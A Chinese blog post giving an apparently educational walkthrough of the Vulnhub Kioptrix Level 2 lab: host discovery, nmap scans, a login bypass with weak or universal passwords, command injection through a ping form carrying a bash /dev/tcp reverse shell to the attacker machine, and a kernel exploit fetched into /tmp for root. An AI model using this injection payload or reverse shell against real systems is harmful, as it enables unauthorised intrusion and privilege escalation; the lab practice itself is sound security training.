OSCP靶机训练Kioptrix Level 2

Vulnhub——Kioptrix Level 2

前期准备:

  1. kali攻击机:10.0.0.4
  2. 靶机:10.0.0.11
  3. 网络适配器全部设置为NAT模式
  4. 靶机需要去配置文件中将所有Bridge改为nat

渗透过程

第一步:主机存活探测

arp-scan -l

image-20240205104712627

第二步:端口扫描

nmap --min-rate 10000 -p- 10.0.0.11

image-20240205104802635

第三步:基本信息扫描

nmap -sT -sC -sV -O -p22,80,111,443,631,936,3306 10.0.0.11

image-20240205104920631

第四步:web渗透

  • 访问web站点

image-20240205105012501

  • 发现需要登录,尝试弱口令以及万能密码进行登录成功

image-20240205105127567

  • 很典型的一个漏洞点,在kali中进行监听

image-20240205105203223

  • 在网页中输入ping 10.0.04; bash -i >& /dev/tcp/10.0.0.4/1234 0>1&

image-20240205105331439

  • 获得普通用户权限

image-20240205105443854

  • 然后就是进行提权,这里我用的内核提权

  • 根据第三步可以知道靶机的系统版本

image-20240205105601016

  • 在kali中搜索该版本系统存在的exp

image-20240205105714230

  • 在kali中建立web服务,然后在靶机中下载exp

image-20240205105801148

image-20240205105837684

  • ····不允许····意料之中了,应该需要找一个允许的文件夹,一般这种情况大多数都会选择/tmp文件夹,去尝试一下

image-20240205110038698

  • 成功了,编译运行一下

image-20240205110131462

posted @   LeouMaster  阅读(41)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】
点击右上角即可分享
微信分享提示